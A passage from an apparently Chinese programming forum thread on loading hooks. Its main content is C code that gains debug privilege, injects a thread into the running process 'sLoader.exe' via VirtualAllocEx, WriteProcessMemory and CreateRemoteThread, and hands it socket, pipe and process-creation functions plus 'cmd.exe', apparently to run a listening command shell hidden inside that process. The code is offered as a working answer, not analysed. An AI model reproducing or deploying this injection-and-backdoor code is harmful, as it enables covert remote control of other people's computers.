Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); // 获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName("sLoader.exe"); if(pID == 0)return 0; hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存 pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(!pRemoteThread)return 0; // 将线程执行体ThreadProc写入远程进程 if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary"); myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress"); myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA"); myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile"); myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile"); myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle"); myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe"); myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess"); hSock = LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,"htons"); myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock,"closesocket"); hUser32 = LoadLibrary("user32.dll"); myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!/0"); strcat(myRemotePara.winsockDll,"wsock32.dll/0"); strcat(myRemotePara.cmd,"cmd.exe/0"); strcat(myRemotePara.telnetmsg,"Connect Sucessful!/n/0"); //写进目标进程 pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); if(!pRemotePara)return 0; if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程 hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write); FreeLibrary(hKernel); FreeLibrary(hSock); FreeLibrary(hUser32); CloseHandle(hRemoteProcess); CloseHandle(hToken); return 0; } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); return((GetLastError() == ERROR_SUCCESS)); } DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0; if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap); return dwRet; } 应该是类似这个的方法

sdv · 2004-06-09

谢谢

请教，关于hook的[加载方式]问题,我1700分一起送,真的没有人会？？？？？？？？？？ (200分)

sdv

Unregistered / Unconfirmed

Another_eYes

Unregistered / Unconfirmed

sdv

Unregistered / Unconfirmed

刘麻子

Unregistered / Unconfirmed

sdv

Unregistered / Unconfirmed

wwssdd2000

Unregistered / Unconfirmed

pclan

Unregistered / Unconfirmed

sdv

Unregistered / Unconfirmed

Similar threads